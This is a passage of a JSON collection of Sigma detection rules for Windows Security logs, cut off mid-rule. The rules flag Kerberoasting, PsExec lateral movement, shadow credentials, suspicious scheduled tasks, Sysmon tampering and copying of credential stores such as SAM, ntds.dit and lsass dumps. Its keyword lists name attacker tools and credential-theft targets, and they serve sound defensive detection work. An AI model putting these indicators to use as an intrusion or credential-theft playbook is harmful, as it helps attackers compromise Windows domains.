    "content": "title: Password Protected ZIP File Opened (Email Attachment)\nid: 571498c8-908e-40b4-910b-d2369159a3da\nstatus: test\ndescription: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.\nreferences:\n    - https://twitter.com/sbousseaden/status/1523383197513379841\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-09\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1027\n    - attack.t1566.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5379\n        TargetName|contains|all:\n            - 'Microsoft_Windows_Shell_ZipFolder:filename'\n            - '\\Temporary Internet Files\\Content.Outlook'\n    condition: selection\nfalsepositives:\n    - Legitimate used of encrypted ZIP files\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml",
    "content": "title: Uncommon Outbound Kerberos Connection - Security\nid: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350\nrelated:\n    - id: e54979bd-c5f9-4d6c-967b-a04b19ac4c74\n      type: similar\nstatus: test\ndescription: |\n    Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.\nreferences:\n    - https://github.com/GhostPack/Rubeus\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-24\nmodified: 2024-03-15\ntags:\n    - attack.lateral-movement\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5156\n        DestPort: 88\n    filter_main_lsass:\n        Application|startswith:\n            - '\\device\\harddiskvolume'\n            - 'C:'\n        Application|endswith: '\\Windows\\System32\\lsass.exe'\n    filter_optional_chrome:\n        Application|startswith:\n            - '\\device\\harddiskvolume'\n            - 'C:'\n        Application|endswith:\n            - '\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n            - '\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Application|startswith:\n            - '\\device\\harddiskvolume'\n            - 'C:'\n        Application|endswith:\n            - '\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n            - '\\Program Files\\Mozilla Firefox\\firefox.exe'\n    filter_optional_tomcat:\n        Application|endswith: '\\tomcat\\bin\\tomcat8.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Web Browsers and third party application might generate similar activity. An initial baseline is required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml",
    "content": "title: Possible Shadow Credentials Added\nid: f598ea0c-c25a-4f72-a219-50c44411c791\nstatus: test\ndescription: Detects possible addition of shadow credentials to an active directory object.\nreferences:\n    - https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html\n    - https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/\n    - https://twitter.com/SBousseaden/status/1581300963650187264?\nauthor: Nasreddine Bencherchali (Nextron Systems), Elastic (idea)\ndate: 2022-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1556\nlogsource:\n    product: windows\n    service: security\n    definition: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)\ndetection:\n    selection:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'msDS-KeyCredentialLink'\n        # If you experience a lot of FP you could uncomment the selection below\n        # There could be other cases for other tooling add them accordingly\n        # AttributeValue|contains: 'B:828'\n        # OperationType: '%%14674' # Value Added\n    # As stated in the FP sections it's better to filter out the expected accounts that perform this operation to tighten the logic\n    # Uncomment the filter below and add the account name (or any other specific field) accordingly\n    # Don't forget to add it to the condition section below\n    # filter:\n        # SubjectUserName: \"%name%\"\n    condition: selection\nfalsepositives:\n    - Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_psexec.yml",
    "content": "title: Suspicious PsExec Execution\nid: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82\nstatus: test\ndescription: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one\nreferences:\n    - https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2022-08-11\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection1:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName|endswith:\n            - '-stdin'\n            - '-stdout'\n            - '-stderr'\n    filter:\n        RelativeTargetName|startswith: 'PSEXESVC'\n    condition: selection1 and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml",
    "content": "title: Suspicious Access to Sensitive File Extensions\nid: 91c945bc-2ad1-4799-a591-4d00198a1215\nrelated:\n    - id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc\n      type: similar\nstatus: test\ndescription: Detects known sensitive file extensions accessed on a network share\nreferences:\n    - Internal Research\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2025-10-17\ntags:\n    - attack.collection\n    - attack.t1039\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        RelativeTargetName|endswith:\n            - '.bak'\n            - '.dmp'\n            - '.edb'\n            - '.kirbi'\n            - '.msg'\n            - '.nsf'\n            - '.nst'\n            - '.oab'\n            - '.ost'\n            - '.pst'\n            - '.rdp'\n            # - '\\groups.xml'  # Commented out: groups.xml is accessed legitimately by Group Policy processing; high FP rate in enterprise environments\n    condition: selection\nfalsepositives:\n    - Help Desk operator doing backup or re-imaging end user machine or backup software\n    - Users working with these data types or exchanging message files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml",
    "content": "title: Suspicious Kerberos RC4 Ticket Encryption\nid: 496a0e47-0a33-4dca-b009-9e6ca3591f39\nstatus: test\ndescription: Detects service ticket requests using RC4 encryption type\nreferences:\n    - https://adsecurity.org/?p=3458\n    - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-06\nmodified: 2022-06-19\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4769\n        TicketOptions: '0x40810000'\n        TicketEncryptionType: '0x17'\n    reduction:\n        ServiceName|endswith: '$'\n    condition: selection and not reduction\nfalsepositives:\n    - Service accounts used on legacy systems (e.g. NetApp)\n    - Windows Domains with DFL 2003 and legacy systems\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml",
    "content": "title: Suspicious Scheduled Task Creation\nid: 3a734d25-df5c-4b99-8034-af1ddb5883a4\nstatus: test\ndescription: Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\nmodified: 2022-12-07\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection_eid:\n        EventID: 4698\n    selection_paths:\n        TaskContent|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Users\\Public\\'\n            - '\\WINDOWS\\Temp\\'\n            - 'C:\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Temporary Internet'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Perflogs\\'\n    selection_commands:\n        TaskContent|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'cmd.exe</Command>'\n            - 'cmd</Command>'\n            - '<Arguments>/c '\n            - '<Arguments>/k '\n            - '<Arguments>/r '\n            - 'powershell'\n            - 'pwsh'\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'certutil'\n            - 'bitsadmin'\n            - 'bash.exe'\n            - 'bash '\n            - 'scrcons'\n            - 'wmic '\n            - 'wmic.exe'\n            - 'forfiles'\n            - 'scriptrunner'\n            - 'hh.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml",
    "content": "title: Important Scheduled Task Deleted/Disabled\nid: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad\nrelated:\n    - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete\n      type: similar\n    - id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 # ProcCreation schtasks disable\n      type: similar\n    - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog\n      type: similar\nstatus: test\ndescription: Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\nmodified: 2023-03-13\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection:\n        EventID:\n            - 4699 # Task Deleted Event\n            - 4701 # Task Disabled Event\n        TaskName|contains:\n            # Add more important tasks\n            - '\\Windows\\SystemRestore\\SR'\n            - '\\Windows\\Windows Defender\\'\n            - '\\Windows\\BitLocker'\n            - '\\Windows\\WindowsBackup\\'\n            - '\\Windows\\WindowsUpdate\\'\n            - '\\Windows\\UpdateOrchestrator\\Schedule'\n            - '\\Windows\\ExploitGuard'\n    filter_sys_username:\n        EventID: 4699\n        SubjectUserName|endswith: '$'  # False positives during upgrades of Defender, where its tasks get removed and added\n        TaskName|contains: '\\Windows\\Windows Defender\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml",
    "content": "title: Suspicious Scheduled Task Update\nid: 614cf376-6651-47c4-9dcc-6b9527f749f4\nrelated:\n    - id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b # ProcCreation schtasks change\n      type: similar\nstatus: test\ndescription: Detects update to a scheduled task event that contain suspicious keywords.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection_eid:\n        EventID: 4702\n    selection_paths:\n        TaskContentNew|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Users\\Public\\'\n            - '\\WINDOWS\\Temp\\'\n            - 'C:\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Temporary Internet'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Perflogs\\'\n    selection_commands:\n        TaskContentNew|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'cmd.exe</Command>'\n            - 'cmd</Command>'\n            - '<Arguments>/c '\n            - '<Arguments>/k '\n            - '<Arguments>/r '\n            - 'powershell'\n            - 'pwsh'\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'certutil'\n            - 'bitsadmin'\n            - 'bash.exe'\n            - 'bash '\n            - 'scrcons'\n            - 'wmic '\n            - 'wmic.exe'\n            - 'forfiles'\n            - 'scriptrunner'\n            - 'hh.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_time_modification.yml",
    "content": "title: Unauthorized System Time Modification\nid: faa031b5-21ed-4e02-8881-2591f98d82ed\nstatus: test\ndescription: Detect scenarios where a potentially unauthorized application or user is modifying the system time.\nreferences:\n    - Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)\n    - Live environment caused by malware\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616\nauthor: '@neu5ron'\ndate: 2019-02-05\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : System > Audit Security State Change, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\System\\Audit Security State Change'\ndetection:\n    selection:\n        EventID: 4616\n    filter_main_svchost:\n        ProcessName: 'C:\\Windows\\System32\\svchost.exe'\n        SubjectUserSid: 'S-1-5-19'\n    filter_optional_vmtools:\n        ProcessName:\n            - 'C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n            - 'C:\\Program Files (x86)\\VMware\\VMware Tools\\vmtoolsd.exe'\n            - 'C:\\Windows\\System32\\VBoxService.exe'\n            - 'C:\\Windows\\System32\\oobe\\msoobe.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - HyperV or other virtualization technologies with binary not listed in filter portion of detection\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_svcctl_remote_service.yml",
    "content": "title: Remote Service Activity via SVCCTL Named Pipe\nid: 586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3\nstatus: test\ndescription: Detects remote service activity via remote access to the svcctl named pipe\nreferences:\n    - https://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2024-08-01\ntags:\n    - attack.lateral-movement\n    - attack.persistence\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName: svcctl\n        AccessList|contains: 'WriteData'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_syskey_registry_access.yml",
    "content": "title: SysKey Registry Keys Access\nid: 9a4ff3b8-6187-4fd2-8e8b-e0eae1129495\nstatus: test\ndescription: Detects handle requests and access operations to specific registry keys to calculate the SysKey\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-12\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ObjectType: 'key'\n        ObjectName|endswith:\n            - 'lsa\\JD'\n            - 'lsa\\GBG'\n            - 'lsa\\Skew1'\n            - 'lsa\\Data'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml",
    "content": "title: Sysmon Channel Reference Deletion\nid: 18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc\nstatus: test\ndescription: Potential threat actor tampering with Sysmon manifest and eventually disabling it\nreferences:\n    - https://twitter.com/Flangvik/status/1283054508084473861\n    - https://twitter.com/SecurityJosh/status/1283027365770276866\n    - https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html\n    - https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-07-14\nmodified: 2025-10-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4657\n        ObjectName|contains:\n            - 'WINEVT\\Publishers\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'\n            - 'WINEVT\\Channels\\Microsoft-Windows-Sysmon/Operational'\n        ObjectValueName: 'Enabled'\n        NewValue: 0\n    selection2:\n        EventID: 4663\n        ObjectName|contains:\n            - 'WINEVT\\Publishers\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'\n            - 'WINEVT\\Channels\\Microsoft-Windows-Sysmon/Operational'\n        AccessMask: '0x10000'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_tap_driver_installation.yml",
    "content": "title: Tap Driver Installation - Security\nid: 9c8afa4d-0022-48f0-9456-3712466f9701\nrelated:\n    - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9\n      type: derived\nstatus: test\ndescription: |\n    Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.\nreferences:\n    - https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers\nauthor: Daniil Yugoslavskiy, Ian Davis, oscd.community\ndate: 2019-10-24\nmodified: 2022-11-29\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The System Security Extension audit subcategory need to be enabled to log the EID 4697'\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains: 'tap0901'\n    condition: selection\nfalsepositives:\n    - Legitimate OpenVPN TAP installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml",
    "content": "title: Suspicious Teams Application Related ObjectAcess Event\nid: 25cde13e-8e20-4c29-b949-4e795b76f16f\nstatus: test\ndescription: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\n    - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens\nauthor: '@SerkinValery'\ndate: 2022-09-16\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4663\n        ObjectName|contains:\n            - '\\Microsoft\\Teams\\Cookies'\n            - '\\Microsoft\\Teams\\Local Storage\\leveldb'\n    filter:\n        ProcessName|contains: '\\Microsoft\\Teams\\current\\Teams.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml",
    "content": "title: Transferring Files with Credential Data via Network Shares\nid: 910ab938-668b-401b-b08c-b596e80fdca5\nrelated:\n    - id: 2e69f167-47b5-4ae7-a390-47764529eff5\n      type: similar\nstatus: test\ndescription: Transferring files with well-known filenames (sensitive files with credential data) using network shares\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2025-07-11\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.001\n    - attack.t1003.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_eid:\n        EventID: 5145\n    selection_object:\n        - RelativeTargetName|contains:\n              - '\\mimidrv'\n              - '\\lsass'\n              - '\\windows\\minidump\\'\n              - '\\hiberfil'\n              - '\\sqldmpr'\n        - RelativeTargetName:\n              - 'Windows\\NTDS\\ntds.dit'\n              - 'Windows\\System32\\config\\SAM'\n              - 'Windows\\System32\\config\\SECURITY'\n              - 'Windows\\System32\\config\\SYSTEM'\n    condition: all of selection_*\nfalsepositives:\n    - Transferring sensitive files for legitimate administration work by legitimate administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml",
    "content": "title: User Added to Local Administrator Group\nid: c265cf08-3f99-46c1-8d59-328247057d57\nstatus: stable\ndescription: Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732\n    - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-14\nmodified: 2021-01-17\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1078\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_eid:\n        EventID: 4732\n    selection_group:\n        - TargetUserName|startswith: 'Administr'\n        - TargetSid: 'S-1-5-32-544'\n    filter_main_computer_accounts:\n        SubjectUserName|endswith: '$'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml",
    "content": "title: User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'\nid: 6daac7fc-77d1-449a-a71a-e6b4d59a0e54\nstatus: test\ndescription: The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.\nreferences:\n    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\nauthor: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community\ndate: 2019-10-24\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4673\n        Service: 'LsaRegisterLogonProcess()'\n        Keywords: '0x8010000000000000'     # failure\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_creation.yml",
    "content": "title: Local User Creation\nid: 66b6be3d-55d0-4f47-9855-d69df21740ea\nstatus: test\ndescription: |\n    Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.\nreferences:\n    - https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/\nauthor: Patrick Bareiss\ndate: 2019-04-18\nmodified: 2021-01-17\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4720\n    condition: selection\nfalsepositives:\n    - Domain Controller Logs\n    - Local accounts managed by privileged account management tools\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_driver_loaded.yml",
    "content": "title: Potential Privileged System Service Operation - SeLoadDriverPrivilege\nid: f63508a0-c809-4435-b3be-ed819394d612\nstatus: test\ndescription: |\n    Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\n    With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\n    This user right does not apply to Plug and Play device drivers.\n    If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\n    This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\nreferences:\n    - https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673\nauthor: xknow (@xknow_infosec), xorxes (@xor_xes)\ndate: 2019-04-08\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_1:\n        EventID: 4673\n        PrivilegeList: 'SeLoadDriverPrivilege'\n        Service: '-'\n    filter_main_exact:\n        ProcessName:\n            - 'C:\\Windows\\System32\\Dism.exe'\n            - 'C:\\Windows\\System32\\rundll32.exe'\n            - 'C:\\Windows\\System32\\fltMC.exe'\n            - 'C:\\Windows\\HelpPane.exe'\n            - 'C:\\Windows\\System32\\mmc.exe'\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\System32\\wimserv.exe'\n            - 'C:\\Windows\\System32\\RuntimeBroker.exe'\n            - 'C:\\Windows\\System32\\SystemSettingsBroker.exe'\n            - 'C:\\Windows\\explorer.exe'\n    filter_optional_others:\n        ProcessName|endswith:\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n            - '\\procmon64.exe'\n            - '\\procmon.exe'\n            - '\\Google\\Chrome\\Application\\chrome.exe'\n            - '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n    filter_main_startswith:\n        ProcessName|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft'\n    filter_optional_dropbox:\n        ProcessName|startswith:\n            - 'C:\\Program Files (x86)\\Dropbox\\'\n            - 'C:\\Program Files\\Dropbox\\'\n        ProcessName|endswith: '\\Dropbox.exe'\n    condition: selection_1 and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_logoff.yml",
    "content": "title: User Logoff Event\nid: 0badd08f-c6a3-4630-90d3-6875cca440be\nstatus: test\ndescription: Detects a user log-off activity. Could be used for example to correlate information during forensic investigations\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647\nauthor: frack113\ndate: 2022-10-14\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 4634\n            - 4647\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml",
    "content": "title: VSSAudit Security Event Source Registration\nid: e9faba72-4974-4ab2-a4c5-46e25ad59e9b\nstatus: test\ndescription: Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)\ndate: 2020-10-20\nmodified: 2022-04-28\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        AuditSourceName: VSSAudit\n        EventID:\n            - 4904\n            - 4905\n    condition: selection\nfalsepositives:\n    - Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe.\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml",
    "content": "title: Windows Defender Exclusion List Modified\nid: 46a68649-f218-4f86-aea1-16a759d81820\nrelated:\n    - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d\n      type: derived\n    - id: a33f8808-2812-4373-ae95-8cfb82134978\n      type: derived\nstatus: test\ndescription: |\n    Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\nauthor: '@BarryShooshooga'\ndate: 2019-10-26\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User'\ndetection:\n    selection:\n        EventID: 4657 # A registry value was modified.\n        ObjectName|contains: '\\Microsoft\\Windows 